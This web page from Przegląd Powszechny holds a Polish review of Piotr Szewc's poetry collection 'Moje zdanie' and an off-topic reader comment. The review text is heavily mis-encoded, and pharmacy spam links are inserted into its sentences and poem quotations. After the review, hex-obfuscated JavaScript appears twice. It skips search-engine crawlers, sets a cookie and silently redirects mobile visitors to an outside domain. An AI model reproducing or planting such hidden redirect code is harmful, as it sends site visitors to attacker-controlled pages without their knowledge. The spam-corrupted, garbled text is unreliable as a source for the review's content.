Przegląd Powszechny

A A A

PrzestrzeAi?? wewnAi??trzna

komentarze

Piotr Szewc, „Moje zdanie”, Wydawnictwo Literackie, KrakA?w 2009, s. 50.

Po zbiorze prA?z poetyckich ai??zCaAi??kiem prywatnieai??? (2009) Piotr Szewc wydaAi?? kolejny zbiA?r utworA?w lirycznych, ktA?re formAi?? i rodzajem ekspresji takA?e ciAi??A?Ai?? ku prozie. Nie jest to wszak istotne, jak juA? pisaAi??am o tamtej ksiAi??A?ce, jakAi?? formuAi??kAi?? okreAi??limy poetyckie zapiski autora ai??zAswiadectwaai???. Jego trylogia zamojska ai??i?? ai??zZagAi??adaai???, ai??zZmierzchy i porankiai???, ai??zBociany nad powiatemai??? ai??i?? napisana prozAi??, w duA?ej mierze byAi??a rA?wnieA? poematem rozAi??oA?onym na wyraziste epizody narracyjne. Szewc patrzy na Ai??wiat przez pryzmat maAi??ych cudA?w dziejAi??cych siAi?? w naturze i w A?yciu poszczegA?lnych istnieAi?? ludzkich, wiAi??c takA?e to, co jest z zaAi??oA?enia prozAi??, wzbogacane jest przez charakterystyczne dla liryki widzenie Ai??wiata i emanacje stanA?w ducha. Piotr AsliwiAi??ski mA?wi podobnie o tej twA?rczoAi??ci: Szewc jako prozaik i tak byAi?? poetAi?? oraz jako poeta nie przestaAi?? byAi?? prozaikiem. GranicAi?? miAi??dzy opowiadaniem a medytacjAi?? uwaA?aAi?? zawsze za pozbawionAi?? wiAi??kszego znaczenia i przekraczaAi?? jAi?? w obie strony bez pytania o pozwolenie (okAi??adka ksiAi??A?ki).

Nowe utwory poetyckie Szewca potwierdzajAi?? tAi?? zasadAi?? pisarskAi?? wymienialnoAi??ci czy przenikalnoAi??ci struktur literackich z prozy do wierszy i odwrotnie. Utwory ze zbioru ai??zMoje zdanieai??? sAi?? rodzajem lirycznego dziennika, w ktA?rym opis Ai??wiata zewnAi??trznego sAi??uA?y w duA?ej mierze, jak sAi??dzAi??, oczyszczaniu przestrzeni wewnAi??trznej w psychice autora, przygotowywaniu miejsca wokA?Ai?? niego na gAi??Ai??boki spokA?j duchowy. Gromadzenie rzeczy i zdarzeAi?? w wierszach to wskazanie na ich przemijalnoAi??Ai??, zmiennoAi??Ai??, moA?e nawet nieistotnoAi??Ai??. Eckhart Tolle, ceniony juA? na caAi??ym Ai??wiecie nauczyciel duchowy, w jednej ze swoich kultowych ksiAi??A?ek pt. ai??zNowa Ziemiaai??? pisaAi??: Gdy juA? dostrzeA?esz i zaakceptujesz krA?tkotrwaAi??oAi??Ai?? wszystkich rzeczy oraz nieuchronnoAi??Ai?? zmiany, moA?esz cieszyAi?? siAi?? przyjemnoAi??ciami tego Ai??wiata, gdy trwajAi??, bez obawy ich utraty i niepokoju o przyszAi??oAi??Ai??. (…) Zrozumienie, A?e ai??zto teA? przeminieai??? pozwala zachowaAi?? dystans, a wraz z dystansem w twoim A?yciu pojawia siAi?? nowy wymiar: przestrzeAi?? wewnAi??trzna.

Trudno siAi?? oprzeAi?? wraA?eniu, A?e wiersze Szewca w twA?rczy sposA?b uzupeAi??niajAi?? psychologiczne idee Tollego. StanowiAi?? wrAi??cz rodzaj duchowego potwierdzenia czy artystycznej praktyki dla teoretycznych rozwaA?aAi?? ai??zPotAi??gi teraA?niejszoAi??ciai???. Dystans poety do przedstawianego Ai??wiata jest bowiem z pewnoAi??ciAi?? faktem, co wiAi??cej: w wielu utworach A?w dystans pogAi??Ai??biony jest dyskretnAi?? ironiAi?? i humorem wobec samego siebie w sytuacjach piAi??trzenia elementA?w codziennego uA?ytku. ZdarzajAi?? siAi?? fragmenty, w ktA?rych poeta celowo urywa myAi??l, skraca rozpoczAi??te zdanie, dajAi??c w ten sposA?b do zrozumienia niepowaA?noAi??Ai?? opisywanej sytuacji i niewielkAi?? wagAi?? ujawnianych faktA?w: MiAi??dzy stacjami Dworzec GdaAi??ski tu zwykle za kwadrans dziewiAi??ta / wsiadam zaraz komA?rki stracAi?? zasiAi??g stojAi?? przy drzwiach trzymam siAi?? / porAi??czy tak chciaAi??bym zabiAi?? w sobie klaustrofoba (…) Ai??adne masz przystojniaku / oprawki okularA?w tatusiu z brzuszkiem mogAi??eAi?? lepiej zawiAi??zaAi?? krawat pani / ziewa i skAi??ada ai??zMetroai??? pan zerka na zegarek a AswiAi??tokrzyska gubiAi?? spojrzenia / Ai??apiAi?? feromony.

Szewc Ai??apie zdarzenia, sytuacje na gorAi??cym uczynku w momencie chwilowego dziania siAi?? i przemijania, w ten sposA?b nadajAi??c im rangAi?? ai??zpotAi??gi teraA?niejszoAi??ciai???. Rozstaje siAi?? teA? z nimi bez A?alu. W pewnym miejscu, nawiAi??zujAi??c do waA?nego dla siebie przeA?ycia ai??i?? Ai??mierci bliskiej osoby ai??i?? mA?wi: Karta chusteczki aspiryna pasek A?eberek program kapusta / coAi?? jeszcze zanotowaAi??aAi?? babciu na drugiej stronie odcinka / emerytury z maja 2007 lata mijaAi??y a charakter twojego pisma / prawie siAi?? nie zmieniaAi?? (…) czasy mieszajAi?? siAi?? zdarzenia / mAi??tniejAi?? po swojemu A?yjAi??. ImponujAi??ca jest powaga i lekkoAi??Ai?? jednoczeAi??nie, czasem nawet niefrasobliwoAi??Ai??, z jakAi?? poeta opisuje fragmenty wAi??asnego A?ycia i A?ycia bliskich, bAi??yskawicznie przechodzAi??c nad nimi do nowego porzAi??dku, do nowych faktA?w i zdarzeAi??. Chwilami moA?e siAi?? to wydawaAi?? irytujAi??ce: nie ma pozornie nic pewnego, nic staAi??ego w jego A?yciu, a przecieA? to wskazywanie na rzeczy i ich aktualny sens, a potem odchodzenie od nich jest w gruncie rzeczy ai??zzdrowymai??? i stanowiAi??cym o ai??zprawdzieai??? istnienia zabiegiem.

Poeta mA?wi w utworze ai??zLiAi??cie kapustyai???: gubimy siAi?? odnajdujemy poAi??rA?d drobiazgA?w (…) wszystko / trochAi?? / nie po kolei to siAi?? uAi??adzi pewnego dnia nabrzmieje / i wyleje. W koAi??cowym wyznaniu jest tutaj sugestia, a moA?e zapowiedA? dramatu, jakiejAi?? lokalnej katastrofy… MoA?na jednak odczytaAi?? ten fragment jako oczekiwanie szczegA?lnego rozwiAi??zania problemA?w, znak ostatecznego uspokojenia. W wielu wierszach A?w zewnAi??trzny zamAi??t budzi w poecie konsternacjAi??; np. w utworze ai??zObrastam w rzeczyai??? lista przedmiotA?w stAi??oczonych wokA?Ai?? bohatera-autora koAi??czy siAi?? pytaniem: dotykam ich / odkurzam przestawiam co dzieAi?? zadajAi?? sobie pytanie kto / do kogo naleA?y i nad kim ma wAi??adzAi??. viagra online viagra purchase buy Lasix http://mediaenmesse.com/2018/02/14/probalan-sale/ ZdarzajAi?? siAi?? teA? poecie konkluzje na wyA?szym, metafizycznym poziomie, jak w wierszu ai??zBiaAi??e smugiai???: straszny mam nieporzAi??dek A?ycie / osobiste pod czAi??Ai??ciowAi?? kontrolAi?? a co z duszAi?? / teA? baAi??agan pewnie dlatego czujAi?? TwA?j wzrok. ObecnoAi??Ai?? Boga jest tutaj dyskretna, podobnie aktualny niepokA?j sumienia i ten dostrzeA?ony we wspomnieniach z dzieciAi??stwa budzi w bohaterze uczuciowy dyskomfort, ale bez poczucia winy.

Grzech ma niskAi?? cenAi?? ai??i?? mA?wi Szewc w jednym z wierszy, choAi?? konwencja jego wyznaAi?? jest taka, A?e nie moA?emy mieAi?? pewnoAi??ci, kiedy drwi, a kiedy mA?wi serio. To asekurowanie siAi??, dystansowanie wobec samego siebie ma tAi?? dodatkowAi?? wartoAi??Ai?? literackAi??, A?e czytelnik nie jest bezpoAi??rednio prowadzony za rAi??kAi??, musi razem z autorem zastanowiAi?? siAi??, przemyAi??leAi?? niektA?re oceny i opinie. Czymkolwiek jest pozwA?l tajemnicy byAi?? tajemnicAi?? ai??i?? ostrzega poeta w wierszu ai??zNie unoAi?? powiekiai???. Wie on doskonale, A?e Ai??wiat nigdy nie bAi??dzie rozpoznany do koAi??ca, a stopieAi?? niewiadomej zaleA?y od stopnia naszej dobrej woli. Poznawcza mAi??droAi??Ai?? wiAi??A?e siAi?? nie tylko z akceptacjAi?? owej niewiadomej, ale teA? z pokorAi?? rezygnacji wobec tajemnicy. ZarA?wno mieszanie faktA?w jak i chwytanie czasu, rzeczy i spraw i umieszczanie ich w wierszu ai??i?? jak na barwnej fotografii ai??i?? to wszystko jest efekt poznawczego trudu poety, ktA?ry nie ma ambicji bycia Panem Bogiem. Przeciwnie, w tytuAi??owym, przewodnim utworze zbioru wyraA?nie okreAi??la zakres wAi??asnych kompetencji: MinAi??liAi??my Majdan i moA?e dlatego A?e siAi?? spieszyAi??em / autosan dostaAi?? zadyszki kierowca wydaAi?? resztAi?? a ja / choAi?? okolica znajoma daremnie wypatrywaAi??em Ai??cieA?ek / po ktA?rych kiedyAi?? jeA?dziAi??em rowerem http://www.the-main-ingredient.com/how-much-does-naprosyn-cost-without-insurance/ (…) http://tintindustry.com/buy-midamor-word/ nazajutrz mieli mamAi?? wypisaAi?? ze szpitala Ai??wiat / skAi??adaAi?? siAi?? w nowAi?? caAi??oAi??Ai?? gdy zatrzasnAi??Ai??em drzwi poczuAi??em / ulgAi?? bo moje zdanie byAi??o mu zupeAi??nie obojAi??tne.

Mimo poznawczych granic i barier emocjonalnych, jakie poeta sam sobie wyznacza, sAi?? w jego wierszach momenty autentycznych uniesieAi?? i to zarA?wno w sferze emocji negatywnych, jak i pozytywnych. Odchodzenie bliskich, choAi?? Szewc widzi w tym nieuchronnoAi??Ai?? losu, z pewnoAi??ciAi?? budzi A?al i smutek poety, podobnie jak sekretne piAi??kno Ai??wiata wywoAi??uje jego zachwyt. Potrafi teA? on wyraziAi?? nagAi??y lAi??k i przemijajAi??ce szczAi??Ai??cie. ai??zTasznik zakwitAi??ai??? to ulotna impresja: Niepozorny przed poAi??owAi?? maja zakwitAi?? biaAi??ymi / drobnymi kwiatami zobaczyAi??em go wczoraj na / Braci ZaAi??uskich roAi??nie pospolicie czytam jako / chwast polny wznosiAi?? siAi?? ku Ai??wiatu ot tak sobie / bezinteresowna czysta opromieniona sAi??oAi??cem / postaAi?? wzruszenia.

CaAi??a liryka Piotra Szewca ma takAi?? wAi??aAi??nie czystoAi??Ai?? i bezinteresownoAi??Ai?? przesAi??ania, jak emanacja wzruszenia, jakAi?? dostrzegAi?? w zakwitajAi??cym taszniku. Przez takie akty Ai??wiadomej obecnoAi??ci w trwajAi??cym wokA?Ai?? nas Ai??wiecie tworzy siAi?? wAi??aAi??nie nasza przestrzeAi?? wewnAi??trzna. A w niej pewnie takA?e BA?g siAi?? rodzi, gdy pomyAi??limy, co jest dla nas najwaA?niejsze.var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

  1. Ipolito napisał(a):

    Krf3ciutko! 🙂 Nie o tym, że 95% składek jest do OFE odprowadzanych źle twdierzą manipulatorzy stosujący opisywane oszustwo. I to na pewno nie jest prawda.Przez Internet można sprawdzić aktualny stan konta na OFE plus ostatnie operacje, ale jakakolwiek prf3ba wyjaśnienia ewentualnych nieprawidłowości to już telefon do OFE, ktf3ry w wielu przypadkach kończy się: Proszę poczekać, środki z ZUSu spływają zwykle z kilkumiesięcznym opf3źnieniem.Dzięki za link do szczegf3łowej analizy aktualnej sytuacji ZUSu i wszechświata! 🙂

Partnerzy:

Pisma jezuickie na świecie:

Prawa autorskie © 2009 Przgląd Powszechny. Wszelkie prawa zastrzeżone.